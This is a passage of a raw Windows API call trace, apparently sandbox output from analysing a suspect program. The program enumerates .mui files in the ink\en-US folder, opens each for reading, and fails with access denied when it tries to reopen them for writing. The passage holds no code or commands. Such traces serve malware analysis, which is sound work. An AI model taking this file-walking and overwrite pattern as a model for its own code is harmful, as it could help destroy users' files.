dwReserved1=0x77892bc0, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0098.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0098.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.934] AreFileApisANSI () returned 1 [0098.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.935] AreFileApisANSI () returned 1 [0098.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0098.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 72 [0098.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.935] GetFileType (hFile=0x418) returned 0x1 [0098.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0098.935] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.935] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.936] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.936] CloseHandle (hObject=0x418) returned 1 [0098.936] AreFileApisANSI () returned 1 [0098.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0098.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 72 [0098.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.936] GetLastError () returned 0x5 [0098.936] GetLastError () returned 0x5 [0098.936] SetLastError (dwErrCode=0x5) [0098.936] GetLastError () returned 0x5 [0098.936] SetLastError (dwErrCode=0x5) [0098.936] GetLastError () returned 0x5 [0098.936] SetLastError (dwErrCode=0x5) [0098.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0098.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0098.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.937] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.937] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TabTip.exe.mui", cAlternateFileName="")) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0098.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0098.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.998] AreFileApisANSI () returned 1 [0098.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", lpUsedDefaultChar=0x0) returned 72 [0098.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.999] AreFileApisANSI () returned 1 [0098.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0098.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 72 [0098.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.999] GetFileType (hFile=0x418) returned 0x1 [0098.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0098.999] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.999] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.000] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.000] CloseHandle (hObject=0x418) returned 1 [0099.000] AreFileApisANSI () returned 1 [0099.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 72 [0099.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.000] GetLastError () returned 0x5 [0099.000] GetLastError () returned 0x5 [0099.000] SetLastError (dwErrCode=0x5) [0099.000] GetLastError () returned 0x5 [0099.000] SetLastError (dwErrCode=0x5) [0099.000] GetLastError () returned 0x5 [0099.000] SetLastError (dwErrCode=0x5) [0099.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffe6194, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7c896e00, ftLastWriteTime.dwHighDateTime=0x1d29fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.001] AreFileApisANSI () returned 1 [0099.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0099.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.002] AreFileApisANSI () returned 1 [0099.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0099.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 72 [0099.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.002] GetFileType (hFile=0x418) returned 0x1 [0099.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0099.002] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.002] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.003] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.003] CloseHandle (hObject=0x418) returned 1 [0099.003] AreFileApisANSI () returned 1 [0099.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 72 [0099.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.003] GetLastError () returned 0x5 [0099.003] GetLastError () returned 0x5 [0099.003] SetLastError (dwErrCode=0x5) [0099.003] GetLastError () returned 0x5 [0099.003] SetLastError (dwErrCode=0x5) [0099.003] GetLastError () returned 0x5 [0099.003] SetLastError (dwErrCode=0x5) [0099.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.004] 